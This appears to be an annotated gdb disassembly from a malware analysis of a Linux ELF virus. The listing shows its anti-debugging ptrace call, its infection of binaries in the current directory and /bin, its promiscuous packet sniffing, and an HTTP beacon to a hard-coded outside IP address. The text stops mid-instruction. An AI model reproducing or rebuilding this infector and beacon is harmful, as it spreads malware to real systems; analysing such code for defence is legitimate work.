(gdb) x/i 0x08048429 #start address 0x8048429: push %ebx 0x804842a: push %ecx 0x804842b: push %edx 0x804842c: push %esi 0x804842d: push %edi 0x804842e: jmp 0x804843b #jmp bottom 0x8048430: pop %eax 0x8048431: mov %eax,%ebx 0x8048433: sub $0x17,%ebx 0x8048439: jmp *%eax #jmp 0x8048440 0x804843b: call 0x8048430 0x8048440: call 0x8048a8f 0x8048445: pop %edi 0x8048446: pop %esi 0x8048447: pop %edx 0x8048448: pop %ecx 0x8048449: pop %ebx 0x804844a: mov $0x8048318,%eax 0x804844f: jmp *%eax #_start (gdb) x/i 0x8048a8f 0x8048a8f: mov $0x2,%eax #fork 0x8048a94: int $0x80 0x8048a96: cmp $0x0,%eax 0x8048a9b: jne 0x8048ad1 #parent 0x8048a9d: call 0x80486f9 #child PARENT (gdb) x/i 0x8048ad1 0x8048ad1: ret #returns to 0x8048445 CHILD (gdb) x/i 0x80486f9 0x80486f9: pusha 0x80486fa: xor %edx,%edx 0x80486fc: push %ebx 0x80486fd: push %ecx 0x80486fe: push %edx 0x80486ff: mov $0x1a,%eax #ptrace, attempt at thwarting debugging 0x8048704: mov $0x0,%ebx 0x8048709: mov $0x0,%ecx 0x804870e: mov $0x1,%edx 0x8048713: int $0x80 #ptrace(PTRACE_TRACEME,0,1); 0x8048715: pop %edx 0x8048716: pop %ecx 0x8048717: pop %ebx 0x8048718: cmp $0xffffffff,%eax #error checking 0x804871d: je 0x8048721 #calls a routine that does exit(0); 0x804871f: popa 0x8048720: ret #returns to 0x8048aa2 (gdb) x/i 0x8048aa2 0x8048aa2: mov %ebx,%eax 0x8048aa4: call 0x8048ad2 (gdb) x/i 0x8048ad2 0x8048ad2: push %eax 0x8048ad3: push %ebx 0x8048ad4: push %ecx 0x8048ad5: push %edx 0x8048ad6: push %esi 0x8048ad7: push %edi 0x8048ad8: push %eax 0x8048ad9: mov $0x2d,%eax #brk 0x8048ade: push %ebx 0x8048adf: mov $0x0,%ebx 0x8048ae4: int $0x80 0x8048ae6: pop %ebx 0x8048ae7: mov %eax,%esi 0x8048ae9: mov %eax,%ebx 0x8048aeb: add $0x10c,%ebx 0x8048af1: mov $0x2d,%eax #brk 0x8048af6: push %ebx 0x8048af7: mov %ebx,%ebx 0x8048af9: int $0x80 0x8048afb: pop %ebx 0x8048afc: cmp %ebx,%eax 0x8048afe: jne 0x8048b66 0x8048b00: movw $0x2e,(%esi) #"." 0x8048b05: push %ebx 0x8048b06: push %ecx 0x8048b07: push %edx 0x8048b08: mov $0x5,%eax #open 0x8048b0d: mov %esi,%ebx 0x8048b0f: mov $0x0,%ecx 0x8048b14: mov $0x0,%edx 0x8048b19: int $0x80 #open(".",O_RDONLY) returns fd 0x8048b1b: pop %edx 0x8048b1c: pop %ecx 0x8048b1d: pop %ebx 0x8048b1e: mov %eax,%edi 0x8048b20: cmp $0xffffffff,%eax #error checking 0x8048b25: je 0x8048b5b 0x8048b27: xor %ecx,%ecx 0x8048b29: push %ebx 0x8048b2a: push %ecx 0x8048b2b: mov $0x59,%eax #readdir 0x8048b30: mov %edi,%ebx 0x8048b32: mov %esi,%ecx 0x8048b34: int $0x80 #readdir(fd,, ); 0x8048b36: pop %ecx 0x8048b37: pop %ebx 0x8048b38: cmp $0x0,%eax #0 means end of directory 0x8048b3d: ja 0x8048b44 0x8048b3f: mov $0x1e,%ecx 0x8048b44: pop %ebx 0x8048b45: push %ebx 0x8048b46: mov %esi,%eax 0x8048b48: add $0xa,%eax 0x8048b4d: call 0x8048b6e 0x8048b52: inc %ecx 0x8048b53: cmp $0x1e,%ecx 0x8048b59: jb 0x8048b29 0x8048b5b: mov $0x2d,%eax #brk error on open jumps here 0x8048b60: push %ebx 0x8048b61: mov %esi,%ebx 0x8048b63: int $0x80 0x8048b65: pop %ebx 0x8048b66: pop %eax 0x8048b67: pop %edi 0x8048b68: pop %esi 0x8048b69: pop %edx 0x8048b6a: pop %ecx 0x8048b6b: pop %ebx 0x8048b6c: pop %eax 0x8048b6d: ret 0x8048b6e: push %ebx #0x8048b4d calls here 0x8048b6f: push %ecx 0x8048b70: push %edx 0x8048b71: push %esi 0x8048b72: push %edi 0x8048b73: push %ebx 0x8048b74: mov %eax,%ecx 0x8048b76: mov $0x2d,%eax #brk 0x8048b7b: push %ebx 0x8048b7c: mov $0x0,%ebx 0x8048b81: int $0x80 0x8048b83: pop %ebx 0x8048b84: mov %eax,%esi 0x8048b86: add $0x1c,%eax 0x8048b8b: mov %eax,%ebx 0x8048b8d: mov $0x2d,%eax #brk 0x8048b92: push %ebx 0x8048b93: mov %ebx,%ebx 0x8048b95: int $0x80 0x8048b97: pop %ebx 0x8048b98: cmp %ebx,%eax 0x8048b9a: jne 0x8048ed3 0x8048ba0: push %ebx 0x8048ba1: push %ecx 0x8048ba2: mov $0x5,%eax #open 0x8048ba7: mov %ecx,%ebx 0x8048ba9: mov $0x2,%ecx 0x8048bae: int $0x80 #open(cwd,O_RDWR); 0x8048bb0: pop %ecx 0x8048bb1: pop %ebx 0x8048bb2: cmp $0xffffffff,%eax #error checking 0x8048bb7: jle 0x8048ec8 0x8048bbd: mov %eax,0x4(%esi) 0x8048bc0: push %ebx 0x8048bc1: push %ecx 0x8048bc2: push %edx 0x8048bc3: mov $0x13,%eax #lseek 0x8048bc8: mov 0x4(%esi),%ebx 0x8048bcb: mov $0x0,%ecx 0x8048bd0: mov $0x2,%edx 0x8048bd5: int $0x80 #lseek(fd,0,SEEK_END); 0x8048bd7: pop %edx 0x8048bd8: pop %ecx 0x8048bd9: pop %ebx 0x8048bda: cmp $0xffffffff,%eax #error checking 0x8048bdf: jle 0x8048ebc 0x8048be5: mov %eax,0x8(%esi) 0x8048be8: push %ebx 0x8048be9: push %ecx 0x8048bea: push %edx 0x8048beb: mov $0x13,%eax #lseek 0x8048bf0: mov 0x4(%esi),%ebx 0x8048bf3: mov $0x0,%ecx 0x8048bf8: mov $0x0,%edx 0x8048bfd: int $0x80 #lseek(fd,0,SEEK_SET); 0x8048bff: pop %edx 0x8048c00: pop %ecx 0x8048c01: pop %ebx 0x8048c02: mov %esi,%ebx 0x8048c04: add $0x1c,%ebx 0x8048c0a: add 0x8(%esi),%ebx 0x8048c0d: mov $0x2d,%eax #brk 0x8048c12: push %ebx 0x8048c13: mov %ebx,%ebx 0x8048c15: int $0x80 0x8048c17: pop %ebx 0x8048c18: cmp %ebx,%eax 0x8048c1a: jne 0x8048ebc 0x8048c20: mov %esi,%ecx 0x8048c22: add $0x1c,%ecx 0x8048c28: push %ebx 0x8048c29: push %ecx 0x8048c2a: push %edx 0x8048c2b: mov $0x3,%eax #read 0x8048c30: mov 0x4(%esi),%ebx 0x8048c33: mov %ecx,%ecx 0x8048c35: mov 0x8(%esi),%edx 0x8048c38: int $0x80 #read(fd,buffer,sizeof(file); 0x8048c3a: pop %edx 0x8048c3b: pop %ecx 0x8048c3c: pop %ebx 0x8048c3d: cmpw $0x2,0x2c(%esi) 0x8048c43: jne 0x8048ebc 0x8048c49: movl $0x0,0xc(%esi) 0x8048c50: xor %ecx,%ecx 0x8048c52: mov %esi,%edi 0x8048c54: add $0x1c,%edi 0x8048c5a: add 0x38(%esi),%edi 0x8048c5d: mov $0x20,%eax 0x8048c62: mul %ecx,%eax 0x8048c64: add %eax,%edi 0x8048c66: cmpl $0x0,0xc(%esi) 0x8048c6d: jne 0x8048cc0 0x8048c6f: cmpl $0x1,(%edi) 0x8048c75: jne 0x8048cc0 0x8048c77: cmpl $0x0,0x4(%edi) 0x8048c7e: jne 0x8048cc0 0x8048c80: mov 0x8(%edi),%eax 0x8048c83: add 0x10(%edi),%eax 0x8048c86: sub $0x1000,%eax 0x8048c8b: cmp 0x34(%esi),%eax 0x8048c8e: je 0x8048eda 0x8048c94: mov 0x4(%edi),%eax 0x8048c97: add 0x10(%edi),%eax 0x8048c9a: mov %eax,0xc(%esi) 0x8048c9d: mov 0x8(%edi),%eax 0x8048ca0: add 0x14(%edi),%eax 0x8048ca3: mov %eax,0x14(%esi) 0x8048ca6: addl $0x1000,0x10(%edi) 0x8048cad: addl $0x1000,0x14(%edi) 0x8048cb4: movl $0x7,0x18(%edi) 0x8048cbb: jmp 0x8048cd0 0x8048cc0: cmpl $0x0,0xc(%esi) 0x8048cc7: je 0x8048d1e 0x8048cc9: addl $0x1000,0x4(%edi) 0x8048cd0: mov %edi,%edx 0x8048cd2: sub %esi,%edx 0x8048cd4: sub $0x1c,%edx 0x8048cda: push %ebx 0x8048cdb: push %ecx 0x8048cdc: push %edx 0x8048cdd: mov $0x13,%eax #lseek 0x8048ce2: mov 0x4(%esi),%ebx 0x8048ce5: mov %edx,%ecx 0x8048ce7: mov $0x0,%edx 0x8048cec: int $0x80 #lseek(fd,,SEEK_SET); 0x8048cee: pop %edx 0x8048cef: pop %ecx 0x8048cf0: pop %ebx 0x8048cf1: cmp $0xffffffff,%eax #error checking 0x8048cf6: je 0x8048ebc 0x8048cfc: push %ebx 0x8048cfd: push %ecx 0x8048cfe: push %edx 0x8048cff: mov $0x4,%eax #write 0x8048d04: mov 0x4(%esi),%ebx 0x8048d07: mov %edi,%ecx 0x8048d09: mov $0x20,%edx 0x8048d0e: int $0x80 #write(fd,,32); 0x8048d10: pop %edx 0x8048d11: pop %ecx 0x8048d12: pop %ebx 0x8048d13: cmp $0x20,%eax #make sure write succeeded 0x8048d18: jne 0x8048ebc 0x8048d1e: inc %cx 0x8048d20: cmp 0x48(%esi),%cx 0x8048d24: jb 0x8048c52 0x8048d2a: push %ebx 0x8048d2b: push %ecx 0x8048d2c: push %edx 0x8048d2d: mov $0x13,%eax #lseek 0x8048d32: mov 0x4(%esi),%ebx 0x8048d35: mov 0xc(%esi),%ecx 0x8048d38: mov $0x0,%edx 0x8048d3d: int $0x80 #lseek( ,,SEEK_SET); 0x8048d3f: pop %edx 0x8048d40: pop %ecx 0x8048d41: pop %ebx 0x8048d42: cmp $0xffffffff,%eax #error checking 0x8048d47: je 0x8048ebc 0x8048d4d: pop %ecx 0x8048d4e: push %ecx 0x8048d4f: push %ebx 0x8048d50: push %ecx 0x8048d51: push %edx 0x8048d52: mov $0x4,%eax #write 0x8048d57: mov 0x4(%esi),%ebx 0x8048d5a: mov %ecx,%ecx 0x8048d5c: mov $0x1000,%edx 0x8048d61: int $0x80 #write( ,,4096); 0x8048d63: pop %edx 0x8048d64: pop %ecx 0x8048d65: pop %ebx 0x8048d66: cmp $0x1000,%eax #make sure write succeeded 0x8048d6b: jne 0x8048ebc 0x8048d71: mov %esi,%edi 0x8048d73: add $0x1c,%edi 0x8048d79: add 0xc(%esi),%edi 0x8048d7c: mov 0x8(%esi),%edx 0x8048d7f: sub 0xc(%esi),%edx 0x8048d82: push %ebx 0x8048d83: push %ecx 0x8048d84: push %edx 0x8048d85: mov $0x4,%eax #write 0x8048d8a: mov 0x4(%esi),%ebx 0x8048d8d: mov %edi,%ecx 0x8048d8f: mov %edx,%edx 0x8048d91: int $0x80 0x8048d93: pop %edx 0x8048d94: pop %ecx 0x8048d95: pop %ebx 0x8048d96: mov 0x3c(%esi),%ecx 0x8048d99: add $0x1000,%ecx 0x8048d9f: push %ebx 0x8048da0: push %ecx 0x8048da1: push %edx 0x8048da2: mov $0x13,%eax #lseek 0x8048da7: mov 0x4(%esi),%ebx 0x8048daa: mov %ecx,%ecx 0x8048dac: mov $0x0,%edx 0x8048db1: int $0x80 #lseek(,,SEEK_SET); 0x8048db3: pop %edx 0x8048db4: pop %ecx 0x8048db5: pop %ebx 0x8048db6: cmp $0xffffffff,%eax #error checking 0x8048dbb: je 0x8048ebc 0x8048dc1: xor %ecx,%ecx 0x8048dc3: mov %esi,%edi 0x8048dc5: add $0x1c,%edi 0x8048dcb: add 0x3c(%esi),%edi 0x8048dce: mov $0x28,%eax 0x8048dd3: mul %ecx,%eax 0x8048dd5: add %eax,%edi 0x8048dd7: mov 0x10(%edi),%eax 0x8048dda: cmp 0xc(%esi),%eax 0x8048ddd: jb 0x8048de8 0x8048ddf: addl $0x1000,0x10(%edi) 0x8048de6: jmp 0x8048df7 0x8048de8: add 0xc(%edi),%eax 0x8048deb: cmp 0x14(%esi),%eax 0x8048dee: jne 0x8048df7 0x8048df0: addl $0x1000,0x14(%edi) 0x8048df7: push %ebx 0x8048df8: push %ecx 0x8048df9: push %edx 0x8048dfa: mov $0x4,%eax #write(,,40); 0x8048dff: mov 0x4(%esi),%ebx 0x8048e02: mov %edi,%ecx 0x8048e04: mov $0x28,%edx 0x8048e09: int $0x80 0x8048e0b: pop %edx 0x8048e0c: pop %ecx 0x8048e0d: pop %ebx 0x8048e0e: inc %cx 0x8048e10: cmp 0x4c(%esi),%cx 0x8048e14: jb 0x8048dc3 0x8048e16: mov 0xc(%esi),%ecx 0x8048e19: add $0x22,%ecx 0x8048e1f: push %ebx 0x8048e20: push %ecx 0x8048e21: push %edx 0x8048e22: mov $0x13,%eax 0x8048e27: mov 0x4(%esi),%ebx #lseek 0x8048e2a: mov %ecx,%ecx 0x8048e2c: mov $0x0,%edx 0x8048e31: int $0x80 #lseek(,,SEEK_SET); 0x8048e33: pop %edx 0x8048e34: pop %ecx 0x8048e35: pop %ebx 0x8048e36: cmp $0xffffffff,%eax #error checking 0x8048e3b: je 0x8048ebc 0x8048e41: mov %esi,%ecx 0x8048e43: add $0x34,%ecx 0x8048e49: push %ebx 0x8048e4a: push %ecx 0x8048e4b: push %edx 0x8048e4c: mov $0x4,%eax #write 0x8048e51: mov 0x4(%esi),%ebx 0x8048e54: mov %ecx,%ecx 0x8048e56: mov $0x4,%edx 0x8048e5b: int $0x80 #write(,,4); 0x8048e5d: pop %edx 0x8048e5e: pop %ecx 0x8048e5f: pop %ebx 0x8048e60: cmp $0x4,%eax #error checking 0x8048e65: jne 0x8048ebc 0x8048e6b: addl $0x1000,0x3c(%esi) 0x8048e72: mov 0x14(%esi),%eax 0x8048e75: mov %eax,0x34(%esi) 0x8048e78: push %ebx 0x8048e79: push %ecx 0x8048e7a: push %edx 0x8048e7b: mov $0x13,%eax #lseek 0x8048e80: mov 0x4(%esi),%ebx 0x8048e83: mov $0x0,%ecx 0x8048e88: mov $0x0,%edx 0x8048e8d: int $0x80 #lseek(,0,SEEK_SET); 0x8048e8f: pop %edx 0x8048e90: pop %ecx 0x8048e91: pop %ebx 0x8048e92: cmp $0xffffffff,%eax #error checking 0x8048e97: je 0x8048ebc 0x8048e9d: mov %esi,%ecx 0x8048e9f: add $0x1c,%ecx 0x8048ea5: push %ebx 0x8048ea6: push %ecx 0x8048ea7: push %edx 0x8048ea8: mov $0x4,%eax #write 0x8048ead: mov 0x4(%esi),%ebx 0x8048eb0: mov %ecx,%ecx 0x8048eb2: mov $0x34,%edx 0x8048eb7: int $0x80 #write(,,52); 0x8048eb9: pop %edx 0x8048eba: pop %ecx 0x8048ebb: pop %ebx 0x8048ebc: mov $0x6,%eax #error jump here 0x8048ec1: push %ebx 0x8048ec2: mov 0x4(%esi),%ebx 0x8048ec5: int $0x80 #close 0x8048ec7: pop %ebx 0x8048ec8: mov $0x2d,%eax #brk 0x8048ecd: push %ebx 0x8048ece: mov %esi,%ebx 0x8048ed0: int $0x80 0x8048ed2: pop %ebx 0x8048ed3: pop %eax 0x8048ed4: pop %edi 0x8048ed5: pop %esi 0x8048ed6: pop %edx 0x8048ed7: pop %ecx 0x8048ed8: pop %ebx 0x8048ed9: ret #return to 0x8048aa9 #second time through return to 0x8048ac5 (gdb) x/i 0x8048aa9 0x8048aa9: push %ebx 0x8048aaa: push $0x0 0x8048aaf: push $0x6e69622f #"/bin" 0x8048ab4: mov %esp,%ebx 0x8048ab6: mov $0xc,%eax #chdir 0x8048abb: int $0x80 #chdir("/bin"); 0x8048abd: pop %ebx 0x8048abe: pop %ebx 0x8048abf: pop %eax 0x8048ac0: call 0x8048ad2 #see above, just did it for cwd 0x8048ac5: call 0x8048a2a (gdb) x/i 0x8048a2a 0x8048a2a: pusha 0x8048a2b: call 0x80486ac (gdb) x/i 0x80486ac 0x80486ac: push %ebx 0x80486ad: push %ecx 0x80486ae: push %edx 0x80486af: push %esi 0x80486b0: push %edi 0x80486b1: jmp 0x80486be #jmp bottom 0x80486b3: pop %eax 0x80486b4: mov %eax,%ebx 0x80486b6: sub $0x17,%ebx 0x80486bc: jmp *%eax #jmp 0x80486c3 0x80486be: call 0x80486b3 #0x80486ac 0x80486c3: push %ebx 0x80486c4: push %ecx 0x80486c5: push %edx 0x80486c6: mov $0x7,%eax #waitpid 0x80486cb: mov $0x0,%ebx 0x80486d0: mov $0x0,%ecx 0x80486d5: mov $0x0,%edx 0x80486da: int $0x80 #waitpid(0,0,0); 0x80486dc: pop %edx 0x80486dd: pop %ecx 0x80486de: pop %ebx 0x80486df: mov %ebx,%ecx 0x80486e1: push %ebx 0x80486e2: push %ecx 0x80486e3: mov $0x30,%eax #signal 0x80486e8: mov $0x11,%ebx 0x80486ed: mov %ecx,%ecx 0x80486ef: int $0x80 #signal(SIGCHLD,0x80486ac); 0x80486f1: pop %ecx 0x80486f2: pop %ebx 0x80486f3: pop %edi 0x80486f4: pop %esi 0x80486f5: pop %edx 0x80486f6: pop %ecx 0x80486f7: pop %ebx 0x80486f8: ret #returns to 0x8048a30 (gdb) x/i 0x8048a30 0x8048a30: mov $0x2,%eax #fork 0x8048a35: int $0x80 0x8048a37: cmp $0x0,%eax 0x8048a3c: jne 0x8048a63 #parent (first child) 0x8048a3e: mov $0x2,%eax 0x8048a43: call 0x80485fd #child (child of first child) PARENT (first child) (gdb) x/i 0x8048a63 0x8048a63: mov $0x1,%eax 0x8048a68: call 0x80485fd (gdb) x/i 0x80485fd 0x80485fd: push %ebx 0x80485fe: push %ecx 0x80485ff: push %edx 0x8048600: push %esi 0x8048601: push %edi 0x8048602: lea 0x30(%eax),%edx 0x8048605: xor %edi,%edi 0x8048607: mov $0x32,%eax 0x804860c: call 0x8048499 (gdb) x/i 0x8048499 0x8048499: push %esi 0x804849a: push %ebx 0x804849b: push %eax 0x804849c: mov $0x2d,%eax #brk 0x80484a1: push %ebx 0x80484a2: mov $0x0,%ebx 0x80484a7: int $0x80 0x80484a9: pop %ebx 0x80484aa: mov %eax,%esi 0x80484ac: pop %ebx 0x80484ad: add %eax,%ebx 0x80484af: mov $0x2d,%eax #brk 0x80484b4: int $0x80 0x80484b6: cmp %ebx,%eax 0x80484b8: jne 0x80484c1 0x80484ba: mov %esi,%eax 0x80484bc: jmp 0x80484c8 0x80484c1: xor %eax,%eax 0x80484c3: jmp 0x80484c8 0x80484c8: pop %ebx 0x80484c9: pop %esi 0x80484ca: ret #returns to 0x8048611 #second time returns to 0x8048740 #third time returns to 0x80489e9 #fourth time returns to 0x8048898 (gdb) x/i 0x8048611 0x8048611: mov %eax,%esi 0x8048613: cmp $0x0,%eax 0x8048618: je 0x80486a4 0x804861e: jmp 0x8048623 #jmp bottom 0x8048620: pop %eax 0x8048621: jmp *%eax #jmp 0x8048628 0x8048623: call 0x8048620 0x8048628: sub $0x35,%eax 0x804862d: mov %eax,%ebx 0x804862f: mov %dl,0x8(%eax) #appends 1 and 2 to hdx ? 0x8048632: push %ebx 0x8048633: push %ecx 0x8048634: push %edx 0x8048635: mov $0x5,%eax #open 0x804863a: mov %ebx,%ebx 0x804863c: mov $0x42,%ecx 0x8048641: mov $0x0,%edx 0x8048646: int $0x80 #open("/dev/hdx" 0x8048648: pop %edx 0x8048649: pop %ecx 0x804864a: pop %ebx 0x804864b: cmp $0xffffffff,%eax #error checking 0x8048650: je 0x8048699 0x8048652: mov %eax,%edx 0x8048654: movw $0x1,(%esi) 0x8048659: movw $0x0,0x2(%esi) 0x804865f: movl $0x0,0x4(%esi) 0x8048666: movl $0x0,0x8(%esi) 0x804866d: mov $0x14,%eax #mknod 0x8048672: int $0x80 #mknod("/dev/hdx", fd); 0x8048674: mov %eax,0xc(%esi) 0x8048677: push %ebx 0x8048678: push %ecx 0x8048679: push %edx 0x804867a: mov $0x37,%eax #fcntl 0x804867f: mov %edx,%ebx 0x8048681: mov $0x6,%ecx 0x8048686: mov %esi,%edx 0x8048688: int $0x80 #fcntl(fd,F_SETLK, ); 0x804868a: pop %edx 0x804868b: pop %ecx 0x804868c: pop %ebx 0x804868d: cmp $0x0,%eax #error checking 0x8048692: jne 0x8048699 0x8048694: mov $0x1,%edi 0x8048699: mov $0x2d,%eax #brk 0x804869e: push %ebx 0x804869f: mov %esi,%ebx 0x80486a1: int $0x80 0x80486a3: pop %ebx 0x80486a4: mov %edi,%eax #it jumps to here 0x80486a6: pop %edi 0x80486a7: pop %esi 0x80486a8: pop %edx 0x80486a9: pop %ecx 0x80486aa: pop %ebx 0x80486ab: ret #returns to 0x8048623 #second time returns to 0x8048a6d 0x8048a6d: cmp $0x0,%eax 0x8048a72: je 0x8048a88 0x8048a74: jmp 0x8048a79 #jmp bottom 0x8048a76: pop %eax 0x8048a77: jmp *%eax #jmp to 0x8048a7e 0x8048a79: call 0x8048a76 0x8048a7e: sub $0x5e,%eax #"ppp0" 0x8048a83: call 0x80489d0 0x8048a88: mov $0x1,%eax #exit 0x8048a8d: int $0x80 (gdb) x/i 0x80489d0 0x80489d0: pusha 0x80489d1: call 0x804872f (gdb) x/i 0x804872f 0x804872f: push %ebx 0x8048730: push %ecx 0x8048731: push %edx 0x8048732: push %esi 0x8048733: push %edi 0x8048734: mov %eax,%edi 0x8048736: mov $0x20,%eax 0x804873b: call 0x8048499 #see above 0x8048740: cmp $0x0,%eax 0x8048745: je 0x80487c3 0x8048747: mov %eax,%esi 0x8048749: mov %edi,%eax 0x804874b: mov %esi,%ebx 0x804874d: mov $0x4,%ecx 0x8048752: call 0x80484f2 0x8048757: mov $0x2,%eax #PF_INET 0x804875c: mov $0xa,%ebx #SOCK_PACKET 0x8048761: mov $0x8,%ecx #EGP 0x8048766: call 0x8048538 0x804876b: mov %eax,%edi 0x804876d: cmp $0xffffffff,%eax #error checking for socketcall 0x8048772: je 0x80487b6 0x8048774: push %ebx 0x8048775: push %ecx 0x8048776: push %edx 0x8048777: mov $0x36,%eax #ioctl 0x804877c: mov %edi,%ebx 0x804877e: mov $0x8913,%ecx 0x8048783: mov %esi,%edx #ppp0 might get changed to eth0 0x8048785: int $0x80 #ioctl(fd,SIOCGIFFLAGS,"ppp0"); 0x8048787: pop %edx 0x8048788: pop %ecx 0x8048789: pop %ebx 0x804878a: cmp $0x0,%eax 0x804878f: jl 0x80487b6 #error checking 0x8048791: orw $0x100,0x10(%esi) 0x8048797: push %ebx 0x8048798: push %ecx 0x8048799: push %edx 0x804879a: mov $0x36,%eax #ioctl 0x804879f: mov %edi,%ebx 0x80487a1: mov $0x8914,%ecx 0x80487a6: mov %esi,%edx 0x80487a8: int $0x80 #ioctl(fd,SIOCSIFFLAGS,"ppp0"); 0x80487aa: pop %edx 0x80487ab: pop %ecx 0x80487ac: pop %ebx 0x80487ad: cmp $0x0,%eax #check for error 0x80487b2: jl 0x80487b6 0x80487b4: mov %edi,%eax 0x80487b6: push %eax #several errors jump here 0x80487b7: mov $0x2d,%eax #brk 0x80487bc: push %ebx 0x80487bd: mov %esi,%ebx 0x80487bf: int $0x80 0x80487c1: pop %ebx 0x80487c2: pop %eax 0x80487c3: pop %edi #jump made to here 0x80487c4: pop %esi 0x80487c5: pop %edx 0x80487c6: pop %ecx 0x80487c7: pop %ebx 0x80487c8: ret #return to 0x80489d6 (gdb) x/i 0x80484f2 0x80484f2: pusha 0x80484f3: xor %edx,%edx 0x80484f5: mov (%eax),%dl 0x80484f7: mov %dl,(%ebx) 0x80484f9: dec %ecx 0x80484fa: inc %eax 0x80484fb: inc %ebx 0x80484fc: cmp $0x0,%ecx 0x8048502: ja 0x80484f5 #loop 0x8048504: popa 0x8048505: ret #return to 0x8048757 (gdb) x/i 0x8048538 0x8048538: push %ecx 0x8048539: push %ebx 0x804853a: push %eax 0x804853b: xor %eax,%eax 0x804853d: mov $0x66,%al #socketcall 0x804853f: xor %ebx,%ebx 0x8048541: mov $0x1,%bl 0x8048543: mov %esp,%ecx 0x8048545: int $0x80 #socketcall(SYS_SOCKET,args) 0x8048547: pop %ecx 0x8048548: pop %ebx 0x8048549: pop %ecx 0x804854a: ret #return to 0x804876b #second time return to 0x80488c8 (gdb) x/i 0x80489d6 0x80489d6: mov %eax,%edi 0x80489d8: cmp $0x0,%eax #check for error 0x80489dd: jl 0x8048a19 #calls exit 0x80489df: mov $0x400,%eax 0x80489e4: call 0x8048499 #see above 0x80489e9: mov %eax,%esi 0x80489eb: cmp $0x0,%eax #check for error 0x80489f0: je 0x8048a19 #calls exit 0x80489f2: call 0x804893d 0x80489f7: push %ebx 0x80489f8: push %ecx 0x80489f9: push %edx 0x80489fa: mov $0x3,%eax #read 0x80489ff: mov %edi,%ebx 0x8048a01: mov %esi,%ecx 0x8048a03: mov $0x400,%edx 0x8048a08: int $0x80 #read(fd,buf,1024); 0x8048a0a: pop %edx 0x8048a0b: pop %ecx 0x8048a0c: pop %ebx 0x8048a0d: mov %esi,%eax 0x8048a0f: call 0x80487cc 0x8048a14: jmp 0x80489f7 #loop 0x8048a19: mov $0x1,%eax 0x8048a1e: int $0x80 (gdb) x/i 0x804893d 0x804893d: pusha 0x804893e: mov $0x10,%eax 0x8048943: call 0x8048499 #see above 0x8048948: cmp $0x0,%eax #check for error 0x804894d: je 0x80489ce #popa ret 0x804894f: mov %eax,%esi 0x8048951: movw $0x2,(%esi) #AF_INET 0x8048956: movw $0x5000,0x2(%esi) #80 (htons) 0x804895c: movl $0x159b42cf,0x4(%esi) #207.66.155.21 0x8048963: mov $0x2,%eax 0x8048968: mov $0x1,%ebx 0x804896d: mov $0x6,%ecx 0x8048972: call 0x8048538 #see above 0x8048977: cmp $0xffffffff,%eax #check for error with socketcall 0x804897c: je 0x80489c3 0x804897e: mov %eax,%edi 0x8048980: mov %edi,%eax 0x8048982: mov %esi,%ebx 0x8048984: mov $0x10,%ecx 0x8048989: call 0x8048571 0x804898e: cmp $0xffffffff,%eax #check for error with socketcall 0x8048993: je 0x80489b8 0x8048995: xor %ebx,%ebx 0x8048997: jmp 0x804899c #jmp bottom 0x8048999: pop %eax 0x804899a: jmp *%eax #jmp 0x80489a1 0x804899c: call 0x8048999 0x80489a1: sub $0x88,%eax 0x80489a6: mov %eax,%ecx "GET /~telcom69/gov.php HTTP/1.0\r\n\r\n" 0x80489a8: call 0x80484cb 0x80489ad: mov %eax,%edx 0x80489af: mov %edi,%ebx 0x80489b1: mov $0x4,%eax #write 0x80489b6: int $0x80 0x80489b8: mov $0x6,%eax #close 0x80489bd: push %ebx 0x80489be: mov %edi,%ebx 0x80489c0: int $0x80 0x80489c2: pop %ebx 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #return to 0x80489f7 (gdb) x/i 0x80489c3 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #returns to 0x804897e (gdb) x/i 0x8048571 0x8048571: push %ecx 0x8048572: push %ebx 0x8048573: push %eax 0x8048574: xor %eax,%eax 0x8048576: mov $0x66,%al #socketcall 0x8048578: xor %ebx,%ebx 0x804857a: mov $0x3,%bl 0x804857c: mov %esp,%ecx 0x804857e: int $0x80 #socketcall(SYS_CONNECT,args); 0x8048580: pop %ecx 0x8048581: pop %ebx 0x8048582: pop %ecx 0x8048583: ret #returns to 0x804898e (gdb) x/i 0x80489b8 0x80489b8: mov $0x6,%eax #close 0x80489bd: push %ebx 0x80489be: mov %edi,%ebx 0x80489c0: int $0x80 0x80489c2: pop %ebx 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #returns to 0x8048995 (gdb) x/i 0x80484cb 0x80484cb: push %ebx 0x80484cc: push %ecx 0x80484cd: push %edx 0x80484ce: push %esi 0x80484cf: mov %eax,%esi 0x80484d1: xor %ecx,%ecx 0x80484d3: lea (%esi,%ecx,1),%edx 0x80484d6: inc %ecx 0x80484d7: cmp %bl,(%edx 0x80484d9: jne 0x80484d3 #loop 0x80484db: mov %ecx,%eax 0x80484dd: dec %eax 0x80484de: pop %esi 0x80484df: pop %edx 0x80484e0: pop %ecx 0x80484e1: pop %ebx 0x80484e2: ret #returns to 0x80489ad (gdb) x/i 0x80487cc 0x80487cc: pusha 0x80487cd: mov %eax,%esi 0x80487cf: mov 0x17(%esi),%al 0x80487d2: cmp $0x11,%al 0x80487d4: jne 0x804880d #popa ret 0x80487d6: jmp 0x80487db #jmp bottom 0x80487d8: pop %eax 0x80487d9: jmp *%eax #jmp 0x80487e0 0x80487db: call 0x80487d8 0x80487e0: sub $0x17,%eax #DOM 0x80487e5: lea 0x2a(%esi),%ebx 0x80487e8: mov $0x3,%ecx 0x80487ed: call 0x8048506 #zen-parse says its memcmp 0x80487f2: cmp $0x0,%eax 0x80487f7: je 0x804880d #strings didn't match 0x80487f9: lea 0x2d(%esi),%eax 0x80487fc: lea 0x2e(%esi),%edi 0x80487ff: cmpb $0x1,(%eax) 0x8048802: je 0x804882a 0x8048804: cmpb $0x2,(%eax) 0x8048807: je 0x804888e 0x804880d: popa 0x804880e: ret #returns to 0x8048a14 (gdb) x/i 0x8048506 0x8048506: push %ebx 0x8048507: push %ecx 0x8048508: push %edx 0x8048509: push %esi 0x804850a: push %edi 0x804850b: mov %eax,%esi 0x804850d: mov %ebx,%edi 0x804850f: mov 